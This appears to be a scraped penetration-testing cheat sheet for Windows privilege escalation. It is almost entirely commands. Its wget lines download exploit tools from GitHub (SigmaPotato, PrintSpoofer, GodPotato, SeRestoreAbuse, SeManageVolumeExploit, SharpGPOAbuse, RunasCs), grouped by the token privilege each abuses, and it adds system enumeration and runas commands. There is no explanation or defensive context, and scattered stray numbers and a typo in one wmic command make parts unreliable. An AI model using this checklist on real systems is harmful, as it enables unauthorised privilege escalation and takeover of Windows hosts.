Exploits
SeBackupPrivilege
1
SeImpersonatePrivilege
SigmaPotato.exe
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
1
PrintSpoof.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
1
GodPotato.exe
NOTE: Know the version by the following
reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
1
SeRestorePrivilege
SeRestoreAbuse.exe
wget https://github.com/dxnboy/redteam/raw/refs/heads/master/SeRestoreAbuse.exe
2
SeManageVolumePrivilege
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
1
3
GPO Abuse
wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
1
2
SearchSploit
1
Windows Enumeration
Identify OS name, version, architecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic os get Caption, Version. OSArchitecture
NOTE: Get Windows Build Version from here.
2
Run as another user
GUI
runas /user:<Domain Name>\<Username> cmd.exe
CLI
wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1
Last updated